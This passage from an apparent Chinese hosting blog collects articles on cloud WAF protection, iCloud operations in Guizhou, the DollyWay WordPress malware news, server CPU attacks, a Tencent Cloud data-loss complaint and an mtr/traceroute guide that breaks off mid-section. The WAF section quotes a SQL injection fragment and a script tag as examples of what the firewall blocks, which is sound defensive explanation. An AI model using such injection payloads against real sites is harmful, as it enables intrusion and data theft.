基于规则的签名检测依赖预定义的规则库(如OWASP Top 10攻击特征),通过正则表达式匹配已知攻击模式(如SQL注入、命令注入等)。规则库由厂商持续更新,支持自动同步以应对新漏洞。 行为分析与机器学习通过分析流量行为特征(如访问频率、请求时序),结合机器学习模型识别异常行为(如暴力破解、CC攻击)。例如,对短时间内高频访问同一接口的IP进行限速或封禁。 零日漏洞防御针对未公开的漏洞(如Spring框架远程代码执行漏洞),通过虚拟补丁技术临时修复漏洞,直至源站完成正式修复。 三、多层防护机制 黑白名单与速率限制 IP黑白名单:直接封禁恶意IP或放行可信IP段。 速率控制:限制单个IP或会话的请求频率,防止DDoS或CC攻击耗尽资源。 会话防护与Cookie验证检测会话劫持或跨站请求伪造(CSRF),例如验证请求来源的合法性或设置动态令牌。 防数据泄露与篡改监控响应内容中的敏感信息(如信用卡号),并阻止网页挂马或内容篡改行为。 四、弹性架构与智能优化 分布式弹性扩展基于云计算的分布式架构可动态扩展资源,应对突发流量或大规模DDoS攻击,确保服务高可用性。 自适应学习与策略优化通过分析历史攻击数据,自动优化规则库并调整防护策略,减少误报率并提升未知威胁的检测能力。 五、联动防护与合规支持 与DDoS高防、HSS等联动例如,DDoS高防负责抵御四层流量攻击,WAF专注七层应用攻击,形成多层防护体系。 合规性内置提供符合PCI DSS、GDPR等法规的预配置策略,简化企业合规流程。 典型防护场景示例 SQL注入防护:检测请求参数中的恶意SQL片段(如' OR 1=1--)并拦截。 XSS攻击拦截:过滤HTML/JavaScript代码中的危险标签(如<script>)。 API安全:监控API调用频率,防止数据泄露或接口滥用。 总结 云WAF通过规则引擎、行为分析、机器学习及弹性架构的综合运用,实现了对Web应用的多维度防护。其核心优势在于实时性、自适应性和易管理性,尤其适合应对快速演变的网络攻击。然而,其防护效果仍依赖规则库的更新速度与算法的智能化程度,需结合企业实际业务场景灵活配置策略。 #### 云上贵州与中国电信合作 国家级网络为iCloud打造毫秒级体验 自2018年2月28日中国内地的iCloud业务正式由云上贵州负责运营后,云上贵州牵手中国电信天翼云为iCloud提供云存储服务,双方已于6月底正式签署《基础设施协议》。作为世界上最大的固定网络运营商、FDD 4G网络运营商和国内最大的数据中心和云服务提供商,中国电信将提供优质的网络和数据中心服务,同时也将成为首家为云上贵州运营的iCloud中国内地业务提供云存储服务的提供商。 中国电信具备端到端的整体能力。中国电信不仅仅是全球最大的宽带网络运营商和国内最大的数据中心服务提供商,同时也在天翼云核心技术领域持续加大自主研发的投入。此次签约的协议中使用的就是中国电信完全自主研发(不基于任何开源的分布式存储)的“天翼云”对象存储OOS。实际上早在2015年,OOSv5.0就已经实现了“跨区域复制”这一业内领先的能力。如今OOS已经升级到v6.1,并已经在全国20多个城市大规模商用,这一国内绝无仅有的规模足以证明中国电信在云服务方面拥有的经验和能力。 iCloud用户遍布全国,任何单一的资源池都无法满足就近服务的需求,通过中国电信“国家存储网络”,用户可实现就近访问和读写数据,体验感自然大幅提升。 1、“国家存储网络”事实上就是把全国的云存储OOS资源池用高速网络互连起来,对外呈现为一个统一的云存储资源池,无论用户通过哪个物理资源池访问OOS,看到的都是同一个视图。 2、“国家存储网络”的核心技术在于,一是如何高效管理数量众多、规模巨大的资源池集群,这本身就是一个复杂的系统工程;二是如何让每个用户从不同的资源池看到同一个视图,这不仅要求资源池之间具备“高速通道”,还要求OOS本身在扩展性、效率方面有精巧的设计;三是如何在相隔数千公里的多个资源池之间,既保证数据的一致性,又提供极低的延迟。天翼云自主研发的OOS v6能够完美解决三大难题,目前已在多个资源池完成了部署,预计2018年底正式上线。 贵州省委常委、常务副省长李再勇,中国电信集团党组成员、副总经理陈忠岳以及贵州省大数据局、发改委、经信委、通管局等有关部门领导、中国电信有关领导和业务代表以及云上贵州有关领导和业务代表出席了本次签约仪式。中国电信代表胡志强、云上贵州公司代表冯磊代表双方签字。 李再勇副省长与陈忠岳副总经理就云网融合、远程医疗等合作事宜进行座谈 #### 云上贵州是什么公司,为何苹果将iCloud交由云上贵州运营 去年 7 月份,苹果宣布斥资 10 亿美元,在贵州建中国内地iCloud数据中心,目前该项目有了新的进展,据报道,从从今年 2 月 28 日起,中国内地的iCloud服务将转由云上贵州公司负责运营。 2017 年 7 月 12 日,苹果与贵州政府签订合作协议,苹果将投资 10 亿美元与中国贵州省和云上贵州公司合作建立“iCloud贵安新区主数据中心”,其中由云上贵州公司运营,苹果公司提供技术支持。苹果公司授权云上贵州公司作为苹果公司在中国大陆运营iCloud服务的唯一合作伙伴。 据人民日报报道,苹果公司透露,从今年 2 月 28 日起,中国内地的iCloud服务将转由云上贵州公司负责运营。自 1 月 10 日起的七周内,苹果将通过电子邮件和推送通知的方式,告知用户这一消息。中国内地iCloud服务转由云上贵州公司运营后,意味着中国苹果用户在上传和下载数据时候,就无需在跨越中美之间的长距离来回传输,拥有更快的响应速度。 云上贵州是什么鬼? 云上贵州大数据产业发展有限公司于2014年11月经贵州省人民政府批准成立,注册资金23500万元,由贵州省大数据发展管理局履行出资人职责,贵州省国有企业监事会进行监管。也就是实实在在的国企业。而且还是一个省级重点公司。这样一想,是不是感觉高大上了很多,什么阿里云、腾讯云好像在云上贵州面前都不是事。怪不得苹果公司把iCloud交给云上贵州负责运营了。云上贵州也跟一般的云公司一样提供云服务器等云产品,而且据主机吧了解,价格比阿里云便宜很多哦。站长可以去了解了解。 #### 云南省网站备案注销(删除)备案申请表.doc 填表须知 (本页是填表须知,不必打印,请只打印申请表,另附上相关证件一并传真)   本申请表仅用于遗忘密码的备案用户注销备案,若有密码请通过接入服务商企业侧系统自行提交注销申请。 申请类别以实际情况进行选择,注销本单位(个人)备案信息的请勾选“注销本单位备案”;注销其他单位(个人)备案信息的请勾选“注销他单位备案”。 按申请依据可分主体依据与域名依据两种,注销申请时请对应具体情况说明原因。 主体依据,即主体冲突,是由证件号重复备案引起的。 域名依据,即域名冲突,是由域名重复备案引起的。 请检查所填写的备案信息(如域名,备案号码等)是否正确;如备案填写无误,仍提示重复(冲突),请先确定是主体冲突还是域名冲突,并在备案管理系统beian.miit.gov.cn的“公共查询”中,查询该信息已被哪个备案主体使用,再根据查询结果填表。 请根据以上情况使用A4打印纸打印《注销、删除备案申请表》,纸张不符、证件不全、未准确清晰完整填写者,视为无效处理。 注销备案相关资料: ①盖有公章的申请表(个人签字) ②单位有效证件(如企业提供企业营业执照副本复印件,个人则身份证复印件等) ③个人域名注册证书(用于证明域名现在归申请人所有,由域名注册商提供) 注销本单位或本人备案,请提供资料①② 注销他人备案,请提供资料①②③ 7.将以上资料传真至0871-63518722,我局在收到申请的五个工作日内进行处理。 #### 云帮手:不错的服务器傻瓜似一键部署建站环境软件 这是一个非常不错的类似于宝塔的软件,有区别在于这款软件是直接通过客户端添加部署服务器,而不需要客户远程服务器后安装,非常方便,只需要自己在本地下载软件安装即可,很傻瓜似。                                                            全面兼容所有云服务商,同时兼容Windows、CentOS、Ubuntu、Debian、OpenSUSE、Fedora等云服务器操作系统 官网地址:https://www.cloudx.cn/ #### 云服务商 GoDaddy 曝光黑客利用 DollyWay 恶意软件劫持 WordPress 站点,波及 2 万网站 3 月 24 日消息,云服务商 GoDaddy 发布安全报告,透露有黑客组织利用一款名为 DollyWay 的恶意木马劫持 WordPress 网站,据称目前已有超过 2 万个网站受到感染。 据悉,相应黑客从 2016 年便开始活动,主要使用恶意流量引导系统(Traffic Direction System,TDS)和 C2 节点构建的分布式网络基础设施对 WordPress 网站进行攻击,之后利用一款名为 DollyWay 的恶意软件在相应网站中部署 C2 和 TDS 节点,从而将访问相应 WordPress 网站的用户重定向到 VexTrio、LosPollos 等平台广告链接页面以牟利。 值得注意的是,这些黑客在成功入侵相应 WordPress 网站后甚至还会悄悄“帮助”这些网站更新 WordPress 系统并移除其他恶意软件,其目的在于彻底控制受害网站,防止其他黑客瓜分其资源。 黑客为了能够长期“驻扎”这些遭到感染的 WordPress 网站,他们还建立了一套“重复感染”机制。即黑客直接将恶意 PHP 代码以 WPCode 小工具的形式注入到网站所有启用的插件,如果管理员察觉网站遭黑客入侵,但未能完全清理干净数据,便会遭到黑客再次入侵。 #### 云服务商Vultr推出免费云主机啦 近几年免费资源少了,国内云服务器都开始涨价了,比如主机吧的服务器以前一千多三年,现在一千多只能够买一年,贵得离谱。 不过国外服务器商还是很良心的,3月8日 消息:Vultr宣布推出一款免费云主机,硬件规格为1vCPU、512MB内存、IPv4地址、10GB存储和2TB流量。该免费云主机适用于运行多个小型网站和Web应用程序。 Vultr表示,为了帮助推动创新,将为符合条件的申请人提供免费的计算能力,申请人需要一个Vultr.com帐户,需要绑定信用卡并且开启双因素认证。而老用户可以直接申请,无需绑定信用卡。 申请通过的用户,Vultr将通过电子邮件和my.vultr.com控制台进行通知。 Vultr是一家提供云计算服务的公司,其总部位于美国新泽西州,于2014年成立。该公司提供的云计算产品包括虚拟专用服务器(VPS)、裸金属服务器、对象存储、负载均衡、云防火墙等。Vultr的服务覆盖全球16个数据中心,用户可以选择根据自己的需要选择最近的数据中心,以获得更快的响应速度和更稳定的服务质量。 Vultr是一个性价比高、全球覆盖、部署快速、操作简便、安全可靠的云计算服务提供商,适合各种规模的应用程序和业务的需求。 #### 云服务器cpu100%是什么攻击? 最近有位客户咨询主机吧:服务器CPU总是满了,升级也没用,是被攻击吗?什么攻击呢? 其实,影响服务器CPU的情况有很多,这里主机吧给大家讲下,具体有哪些因素会影响服务器CPU占用率。 1.程序问题 一些网站程序、APP等由于数据过多,或者进行某些占用CPU极大的任务时是会使用CPU占满,比如内容采集等。想要检查是不是程序问题很简单,查看网站的请求日志就行,如果网站没什么请求,却占满的,那极可能是程序问题了,可以考虑升级服务器配置或优化程序。 2.服务器中毒所致 一些网站程序存在漏洞,被黑客利用投递负荷攻击,使服务器CPU长期占满。主机吧之前就认识一个卖程序的,长期出售有漏洞的程序,然后再投递攻击,再告诉客户买高防,非常恶劣的行为。检查方式跟上面一样,查看网站请求日志,如果网站没什么请求,然后PHP、MYSQL却长期占满的,而且网站数据也没多少的,那就可能是被人负荷攻击了。 解决办法只能修复程序漏洞,或者更换安全的程序了,也可以购买一些安全防火墙WAF,有一定的作用。 3.CC攻击 CC攻击DDOS的一种,不过由于其成本比较低,而且造成的破坏比较长,防御起来也比较麻烦,跟传统DDOS有一定的区别,所以CC攻击在国内是非常普遍的攻击手段,主要体现在于造成网站服务器CPU长期占满,导致网站无法打开,502的情况。检查方法也很简单,查看网站请求日志,如果日志每秒请求非常高的,那说明就是CC攻击了。 解决办法是购买高防CDN、高防IP进行专业防御,如果不懂的主机吧这边有,可以咨询主机吧购买。 #### 云服务器也不完全安全!腾讯云硬盘故障,导致用户「数据完全丢失」 7月20日,腾讯云北京三区部分云硬盘IO异常。但是没有想到如此严重,竟然导致一家互联网创业公司“前沿数控技术”线上生产数据完全丢失。目前尚不得知此次「用户数据完全丢失」是否属个例。 以下为故障用户与腾讯云在线客服沟通过程: 以下内容为用户自述: 前沿数控是一家以微信公众号起家的创业公司,2014年注册了微信公众号“前沿数控技术”,精准定位于数控、模具、机械行业,随后垂直行业精准关注量突破了40万,在2016年获得知名公司的投资从而加速了“前沿数控技术”的发展,公司业务也从微信公众号转型为打造行业的一站式平台,开发了包括网站、H5、小程序产品,并与全球高端装备制造业的德国、日本、瑞士、美国等一批龙头企业建立起深度合作。 为应对迅速增加的流量趋势以及安全可靠的需求,“前沿数控技术”选用了腾讯云服务器。而灾难就发生在2018年7月20日,近千万元级的平台数据全部丢失,包括经过长期推广导流积累起来的精准注册用户以及内容数据,这瞬间将一家创业公司摧毁…. 经咨询IT行业专业人士,人家表示难以理解:“数据在腾讯云上因为硬盘挂了就丢失了,实在不可思议,即使一家公司使用自己的服务器,硬盘故障导致服务器宕机都能恢复数据,这个技术并不难,更何况云是有副本的,他们应该有容灾机制和数据完整性检验,以保证数据可恢复;即使全部损坏,只要硬盘没有物理毁灭也能恢复出数据….” 在事故发生后,腾讯云起初没有回避问题,承认他们会对此事故负责并声称这是他们此前从来没有发生过的事故,并且希望我们给他们一些时间来处理赔偿。 但实际上,腾讯云以大公司傲居的态度,真的让人无法接受。对一个“时间就是命根子”的互联网创业公司来说,在与腾讯云的交涉过程中他们给出的答复始终是“已向公司相关部门反馈,请耐心等待”。 直到事故发生的第14天,腾讯云才给出答复,这是一个足以让人崩溃的答复:补偿责任总额不会超过腾讯云公司就违约服务收取的服务费用总额,另外赠送一个腾讯云价值10万元的套餐包(不知道是什么东西)。随后,腾讯云好像感觉到这样的答复好像有什么不妥,很快将赔偿方案中的10万套餐包改为13.29万元现金,说这是他们争取的最大赔偿了。 让人难以相信,这居然是腾讯云给出的解决方案?口口声声说很重视,实际上却置创业公司的生死不顾! 那是我们花了两年多心血打造的平台!当所有内容数据全部丢失,在这种情况下需要花多大代价才能恢复运营?还能运营得起来吗?拿这13万能用来干什么?那是我们公司的命脉! 灾难已经发生,腾讯云公司给出的处理结果令人气愤,这就坚定了“前沿数控技术”平台去维权的决心,我们相信这个社会的正义感是存在的,法律是能保护财产不受损失的,就算是鸡蛋碰石头也要去碰…. 我们不知道”前沿数控技术”是不是腾讯云十亿分之一几率的受损客户,我们需要腾讯云就事故给出一个明确说法,给出可以维持一家创业公司得以生存的赔偿,希望相关正义人士关注事件。 以下记录了此次事故发生的全过程,   7月20日(周五) 20:00左右,我司网站、小程序、H5突然出现打不开。 于是紧急安排程序员检查原因,发现无法登陆云服务器,重启也不行。 晚上23:00在腾讯云后台发起工单求助,腾讯云迅速给出了答复:北京三区部分云硬盘出现故障,正在紧急恢复中。 7月21日(周六) 焦急的等待中,早上,我司程序员没有看到腾讯云的回复信息。再次发起工单询问故障是否已经处理好,经过多条工单沟通没有得到明确的答复。 我们几乎是每隔半小时就拨打一次腾讯云的紧急服务电话催促结果,得到的答复是数据暂时没有办法恢复,专家团队正在紧急抢修中。 15:49腾讯云回复,让我们尝试恢复数据。我司程序员按其方法操作后,发现下载的数据已经损坏,无法使用。 此时,一种不祥的预感随之而来。上午我们担心的问题还是产品的停运会给用户带来不好的体验,给平台带来流量损失。但在腾讯云下午告知数据不能被恢复时,我们接近崩溃,此时最迫切的期望是能够恢复数据,平台短时间停运的那点损失就谈不上什么了。 随后不断拨打腾讯云投诉电话,要求无论如何,只要有一线希望就要恢复数据。腾讯云的答复是问题已经升级为优先级,已经上报给相关负责人。   7月22日(周日) 再着急也没有用,投诉电话打了一个又一个,客服人员的态度永远是标准化的答复 “请您耐心等待,问题已经反馈上去了”。 12:24,接到来自腾讯云深圳的电话,一位高小姐说她是处理投诉的负责人,由她专门来对接这个事故,她表达了由于腾讯云云硬盘发生的故障导致数据丢失,腾讯云已经尽到最大努力了,但数据的确找不回来了,想听取要求赔偿的意见。 我们再次表达,我们的需求不是索赔,简单介绍了数据的重要性,希望腾讯云尽全力把数据恢复回来。高小姐表示几乎没有希望了,她会给公司转达我们的意见,再做一次技术努力,答应在周一回复处理意见。 时间已经过去了2天,产品全部停运,我们是度日如年,当天晚上写了一封正式的投诉信盖公章通过腾讯云后台提交过去,迫切希望能够引起腾讯云高层的重视,因为这不是一次普通的数据事故,这关系到一家创业公司的生死。   7月23日(周一) 到了周一工作日,想必腾讯云应该会对紧急事故给出处理意见,但却没有! 直到下午13:40分,在腾讯云后台才收到一条应付式的答复:您好,您的投诉信和相关意见已收到,我们已再次升级反馈,如有进展会第一时间联系您,谢谢! 随后,我们回复了一条信息:如果周六、周日响应没有那么及时还可以理解,而昨晚的投诉,到今天的工作日,在下午13:40才给出一个形式的答复,这就不能理解。 20:56腾讯云高小姐来电,说明了数据100%找不回来了,表达公司已经高度重视这次事故,打电话的目的是想详细了解“前沿数控技术”此次数据丢失带来的损失。 整个通话过程将近一小时,我们坦诚向高小姐详细介绍了前沿数控平台的发展,此次数据丢失带来的严重后果。最后高小姐表示她会向公司领导详细报告,明天会给我们一个答复意见。   7月24日(周二) 又是等待回复!到了下午17:40还没有看到回复意见。又着急去后台询问进展。 19:16分腾讯云高小姐来电,表达了她已经在推动公司领导给出意见,希望我们再耐心等待一下。   7月25日(周三) 度日如年的过了一天,等待腾讯云的答复。   7月26日(周四) 15:00腾讯云高小姐来电,说她已经把我们反馈的情况报告上去了,公司老板已经知道了这件事,但要求我们将索赔的方案落实在书面上,通过邮件发给她。当时加了高小姐的微信。 当天晚上,我们迅速撰写了一份文件《前沿数控技术平台损失预估》,包括前沿数控技术产品线发展及相关情况、丢失的数据、给前沿数控技术平台带来的影响、平台损失价值评估。 此次事故,前沿数控技术平台丢失的数据包括PC网页、H5、小程序共用的核心数据。平台注册的精准用户数据全部丢失、数十万条用户帖子全部丢失、行业品牌库数据及所有录入的资讯全都丢失。因为是高度垂直的行业,获得流量是极其困难的事情,而这些数据是基于两年多的推广才逐步积累起来的。 从7月20日20:00起,平台已全部停运,活跃用户在网站停运的情况下逐渐流失,平台信任度将降至冰点,后续再恢复活跃度面临几何级的极大挑战,广告主在平台的广告投入已不能正常展示,面临退款赔偿及老客户丢失,公司融资计划也被中止。一家快速发展的创业公司瞬间回到“只能依靠微信公众号”的初期,企业陷入生存危机! 我们希望腾讯云正面问题评估损失,让我们恢复产品上线,然后加大力度推广看还有没有机会能将产品恢复活跃度。   7月27日(周五) 给高小姐发微信要邮箱,她给了我们一个163的邮箱。 随后我们通过邮件、微信给高小姐发送了文件《前沿数控技术平台损失预估》,高小姐答应当天回复进展。 到了晚上,高小姐告诉我们邮件已经转给公司相关部门人员了,因为事情比较特殊,他们需要一些时间来评估,需要我们耐心等待。   7月28日(周六) 12:20高小姐打电话过来,问关于文件《前沿数控技术平台损失预估》中评估的损失有没有可以提供的依据或事实证明,他们需要用来评估。我们的意见是,相关的依据与事实证明我们会在必要的时候提供,现在的关键是腾讯云的赔偿意见是什么,是否认同我们的方案。 高小姐又是让我们耐心等待,她会汇报意见。   7月29日(周日) 12:15高小姐打电话过来,说腾讯云的的大客户售后总经理、市场部骨干会安排在下周一下午来我们公司拜访沟通。高小姐拉了一个微信群。 我们当时瞬间感受到了腾讯云的诚意,感觉这次可能就比较靠谱了,于是安排约好了见面沟通。   7月30日(周一) 腾讯云的大客户售后总经理徐先生,还有两名腾讯云的随同人员一起过来我们公司。徐先生表达了歉意,说明他们这次拜访的目的是想怎么帮助我们迅速恢复已经停运的产品。 数据全都丢了,还能怎么快速恢复? 他们了解完情况后,认识到了此次数据带来的后果比较严重,产品没法迅速恢复运营,他们需要时间回去再商量,答应在周四给出具体赔偿金额的方案。   7月31日—8月1日(周二—周三) 等待腾讯云给出最终的赔偿方案。   8月2日(周四) 我们在微信群里催促徐先生今天什么时候给出赔偿方案,答复是下午发送给我们并电话沟通。 下午18:17接到腾讯云高小姐的来电,说明了他们的赔偿方案是:补偿责任总额不超过腾讯云公司就违约服务收取的服务费用总额,另外赠送一个腾讯云价值十万元的套餐包。 听到这样的答复,我们几乎瞬间崩溃!随后,腾讯云好像感觉到这样的答复好像有什么不妥,很快将赔偿方案中的10万套餐包改为13.29万元现金。 一个创业公司花二年多心血打造的平台就这样被腾讯云给毁了,在公司生与死的抉择关口,腾讯云公司口口声声说重视,他们会对事故负责,我们也期盼腾讯云能提供合理的赔偿资金来还创业公司的一线生机。而经过苦苦等待十多天,得到的结果却是少得可怜的赔偿….. 我们也坚定了维权的决心,我们相信这个社会的正义感是存在的,法律是能保护财产不受损失的,就算是鸡蛋碰石头也要去碰…. 这里面也涉及到很多专业的问题,腾讯云声称的99.9999999%数据可靠性,搭载了云硬盘三副本存储策略,是否有夸大事实?腾讯云所谓的云服务器是否是真正意义上的“云”?腾讯云所谓的3备份是不是真实的?这些都值得行业去思考与探讨… #### 云服务器使用ping命令丢包或不通时的链路测试方法 概述 当客户端访问目标服务器出现ping丢包或ping不通时,可以通过tracert或mtr等工具进行链路测试来判断问题根源。本文介绍如何通过工具进行链路测试和分析。   详细信息 本文分别介绍如下链路测试方法。 链路测试工具 测试结果的简要分析 常见的链路异常场景 链路测试步骤 测试完成后的解决方法   链路测试工具 操作系统类型不同,链路测试所使用的工具也有所不同。简要介绍如下。   Linux系统 此处简单介绍两个链路测试工具。   工具一:mtr命令 mtr(My traceroute)几乎是所有Linux发行版本预装的网络测试工具。其将ping和traceroute的功能合并,所以功能更强大。mtr默认发送ICMP数据包进行链路探测。您也可以通过“-u”参数来指定使用UDP数据包进行探测。相对于traceroute只会做一次链路跟踪测试,mtr会对链路上的相关节点做持续探测并给出相应的统计信息。所以,mtr能避免节点波动对测试结果的影响,所以其测试结果更正确,建议优先使用。   用法说明 mtr [-BfhvrwctglxspQomniuT46] [--help] [--version] [--report] [--report-wide] [--report-cycles=COUNT] [--curses] [--gtk] [--csv|-C] [--raw] [--xml] [--split] [--mpls] [--no-dns] [--show-ips] [--address interface] [--filename=FILE|-F] [--ipinfo=item_no|-y item_no] [--aslookup|-z] [--psize=bytes/-s bytes] [--order fields] [--report-wide|-w] [--inet] [--inet6] [--max-ttl=NUM] [--first-ttl=NUM] [--bitpattern=NUM] [--tos=NUM] [--udp] [--tcp] [--port=PORT] [--timeout=SECONDS] [--interval=SECONDS] HOSTNAME 常见可选参数说明 --report:以报告模式显示输出。 --split:将每次追踪的结果分别列出来,而非统计整个结果。 --psize:指定ping数据包的大小。 --no-dns:不对IP地址做域名反解析。 --address:主机有多个IP地址时,设置发送数据包的IP地址。 -4:只使用IPv4协议。 -6:只使用IPv6协议。 另外,也可以在mtr运行过程中,输入类似如下的字母来快速切换模式。 ?或h:显示帮助菜单。 d:切换显示模式。 n:启用或禁用DNS域名解析。 u:切换使用ICMP或UDP数据包进行探测。   命令输出示例   返回结果说明 默认配置下,返回结果中各数据列的说明如下。 第一列(Host):节点IP地址和域名。按 n 键可切换显示。 第二列(Loss%):节点丢包率。 第三列(Snt):每秒发送数据包数。默认值是10,可以通过“-c”参数指定。 第四列(Last):最近一次的探测延迟。 第五、六、七列(Avg、Best、Worst):分别是探测延迟的平均值、最小值和最大值。 第八列(StDev):标准偏差。越大说明相应节点越不稳定。   工具二:traceroute命令 traceroute也是几乎所有Linux发行版本预装的网络测试工具,用于跟踪Internet协议(IP)数据包传送到目标地址时经过的路径。traceroute先发送小的具有最大存活时间值(Max_TTL)的UDP探测数据包,然后侦听从网关开始的整个链路上的ICMP TIME_EXCEEDED响应。探测从TTL=1开始,TTL值逐步增加,直至接收到ICMP PORT_UNREACHABLE消息。ICMP PORT_UNREACHABLE消息用于标识目标主机已经被定位,或命令已经达到允许跟踪的最大TTL值。traceroute默认发送UDP数据包进行链路探测。可以通过“-I”参数来指定使用ICMP数据包进行探测。   用法说明 traceroute [-I] [ -m Max_ttl ] [ -n ] [ -p Port ] [ -q Nqueries ] [ -r ] [ -s SRC_Addr ] [ -t TypeOfService ] [ -f flow ] [ -v ] [ -w WaitTime ] Host [ PacketSize ] 常见可选参数说明 -d:使用Socket层级的排错功能。 -f:设置第一个检测数据包的存活数值TTL的大小。 -F:设置不要分段标识。 -g:设置来源路由网关,最多可设置8个。 -i:主机有多个网卡时,使用指定的网卡发送数据包。 -I:使用ICMP数据包替代UDP数据包进行探测。 -m:设置检测数据包的最大存活数值TTL的大小。 -n:直接使用IP地址而非主机名称(禁用DNS反查)。 -p:设置UDP传输协议的通信端口。 -r:忽略普通的Routing Table,直接将数据包发送到目标主机上。 -s:设置本地主机发送数据包的IP地址。 -t:设置检测数据包的TOS数值。 -v:详细显示指令的执行过程。 -w:设置等待远端主机回包时间。 -x:开启或关闭数据包的正确性检验。   命令输出示例   Windows系统 此处简单介绍两个链路测试工具。   工具一:WinMTR(建议优先使用) WinMTR是mtr工具在Windows环境下的图形化实现,但进行了功能简化,只支持部分mtr的参数。WinMTR默认发送ICMP数据包进行探测,无法切换。和mtr一样,相比tracert,WinMTR能避免节点波动对测试结果的影响,所以测试结果更正确。所以在WinMTR可用的情况下,建议优先使用WinMTR进行链路测试。 注:可以单击此处下载WinMTR工具。   用法说明 WinMTR无需安装,直接解压运行即可。操作方法非常简单,说明如下。 如下图所示,运行程序后,在 Host 字段输入目标服务器域名或IP,注意不要包含空格。 单击 Start 开始测试。开始测试后,相应按钮变成了 Stop。 运行一段时间后,单击 Stop 停止测试。 其它选项说明如下。 Copy Text to clipboard:将测试结果以文本格式复制到粘贴板。 Copy HTML to clipboard:将测试结果以HTML格式复制到粘贴板。 Export TEXT:将测试结果以文本格式导出到指定文件。 Export HTML:将测试结果以HTML格式导出到指定文件。 Options:可选参数,包括的可选参数如下。 Interval(sec):每次探测的间隔(过期)时间。默认为1秒。 ping size(bytes):ping探测所使用的数据包大小,默认为64字节。 Max hosts in LRU list:LRU列表支持的最大主机数,默认值为128。 Resolve names:通过反查IP地址,以域名显示相关节点。   返回结果说明 默认配置下,返回结果中各数据列的说明如下。 第一列(Hostname):节点的IP或域名。 第二列(Nr):节点编号。 第三列(Loss%):节点丢包率。 第四列(Sent):已发送的数据包数量。 第五列(Recv):已成功接收的数据包数量。 第六、七、八、九列(Best 、Avg、Worst、Last):分别是到相应节点延迟的最小值、平均值、最大值和最后一次值。   工具二:tracert命令行工具 tracert(Trace Route)是Windows自带的网络诊断命令行程序,用于跟踪Internet协议(IP)数据包传送到目标地址时经过的路径。 tracert通过向目标地址发送 ICMP 数据包来确定到目标地址的路由。在这些数据包中,tracert使用了不同的IP“生存期”,即TTL值。由于要求沿途的路由器在转发数据包前必须至少将TTL减少1,因此TTL实际上相当于一个跃点计数器 (hop counter)。当某个数据包的TTL达到0时,相应节点就会向源计算机发送一个ICMP超时的消息。   tracert第一次发送TTL为“1”的数据包,并在每次后续传输时将TTL增加“1”,直到目标地址响应或达到 TTL 的最大值。中间路由器发送回来的 ICMP“超时”消息中包含了相应节点的信息。   用法说明 tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] [-R] [-S srcaddr] [-4] [-6] target_name 常见可选参数说明 -d:不要将地址解析为主机名(禁用DNS反解)。 -h:maximum_hops,指定搜索目标地址时的最大跃点数。 -j: host-list,指定沿主机列表的松散源路由。 -w:timeout,等待每个回复的超时时间(以毫秒为单位)。 -R:跟踪往返行程路径(仅适用于IPv6)。 -S:srcaddr,要使用的源地址(仅适用于IPv6)。 -4:强制使用IPv4。 -6:强制使用IPv6。 target_host:目标主机域名或IP地址。   命令输出示例 C:\> tracert -d 223.5.5.5 通过最多 30 个跃点跟踪到 223.5.5.5 的路由 1 请求超时。 2 9 ms 3 ms 12 ms 192.168.X.X 3 4 ms 9 ms 2 ms X.X.X.X 4 9 ms 2 ms 1 ms XX.XX.XX.XX 5 11 ms 211.XX.X.XX 6 3 ms 2 ms 2 ms 2XX.XX.1XX.XX 7 2 ms 2 ms 1 ms 42.XX.2XX.1XX 8 32 ms 4 ms 3 ms 42.XX.2XX.2XX 9 请求超时。 10 3 ms 2 ms 2 ms 223.5.5.5 跟踪完成。   测试结果的简要分析 由于mtr(WinMTR)有更高的准确性,本文以其测试结果为例,参考如下要点进行分析。此处分析时以如下示例图为基础。   要点一:网络区域 正常情况下,从客户端到目标服务器的整个链路中会包含如下区域。 客户端本地网络,即本地局域网和本地网络提供商网络。如上图中的区域A。如果该区域出现异常,并且是客户端本地网络中的节点出现异常,则需要对本地网络进行相应的排查分析。如果是本地网络提供商网络出现异常,则需要向当地运营商反馈问题。 运营商骨干网络。如上图中的区域B。如果该区域出现异常,可以根据异常节点的IP查询其所属的运营商,直接向对应运营商进行反馈,或者通过阿里云技术支持,向运营商进行反馈。 目标服务器本地网络,即目标服务器所属提供商的网络。如上图中的区域C。如果该区域出现异常,需要向目标服务器所属的网络运营商反馈问题。   要点二:链路负载均衡 如上图中的区域D。如果中间链路某些部分启用了链路负载均衡,则mtr只会对首尾节点进行编号和探测统计。中间节点只会显示相应的IP或域名信息。   要点三:结合Avg(平均值)和StDev(标准偏差)综合判断 由于链路抖动或其它因素的影响,节点的Best和Worst值可能相差很大。Avg统计了自链路测试以来所有探测的平均值,所以能更好的反应出相应节点的网络质量。而StDev越高,则说明数据包在相应节点的延时值越不相同,即越离散。所以标准偏差值可用于协助判断Avg是否真实反应了相应节点的网络质量。例如,如果标准偏差很大,说明数据包的延迟是不确定的。可能某些数据包延迟很小,例如25ms,而另一些延迟却很大,例如350ms,但最终得到的平均延迟反而可能是正常的。所以,此时Avg并不能很好的反应出实际的网络质量情况。   综上,建议的分析标准如下。 如果StDev很高,则同步观察相应节点的Best和Worst,来判断相应节点是否存在异常。 如果StDev不高,则通过Avg来判断相应节点是否存在异常。 注:上述StDev高或者不高,并没有具体的时间范围标准。而需要根据同一节点其它列的延迟值大小来进行相对评估。比如,如果Avg为30ms,那么,当StDev为25ms,则认为是很高的偏差。而如果Avg为325ms,则StDev同样为25ms,反而认为是不高的偏差。   要点四:Loss%(丢包率)的判断 任一节点的Loss%(丢包率)如果不为零,则说明这一跳网络可能存在问题。导致相应节点丢包的原因通常有如下两种。 运营商基于安全或性能需求,限制了节点的ICMP发送速率,导致丢包。 节点确实存在异常,导致丢包。 结合异常节点及其后续节点的丢包情况,并参考如下内容,判定丢包原因。 如果随后节点均没有丢包,则通常表示异常节点丢包是由于运营商策略限制所致。可以忽略相关丢包。如上图中的第2跳所示。 如果随后节点也出现丢包,则通常说明异常节点确实存在网络异常,导致丢包。如上图中的第5跳所示。 另外,上述两种情况可能同时发生,即相应节点既存在策略限速,又存在网络异常。对于这种情况,如果异常节点及其后续节点连续出现丢包,而且各节点的丢包率不同,则通常以最后几跳的丢包率为准。如上图所示,在第 5、6、7跳均出现了丢包。所以,最终丢包情况,以第7跳的40%作为参考。   要点五:关于延迟 关于延迟,有如下两种场景。   场景一:延迟跳变 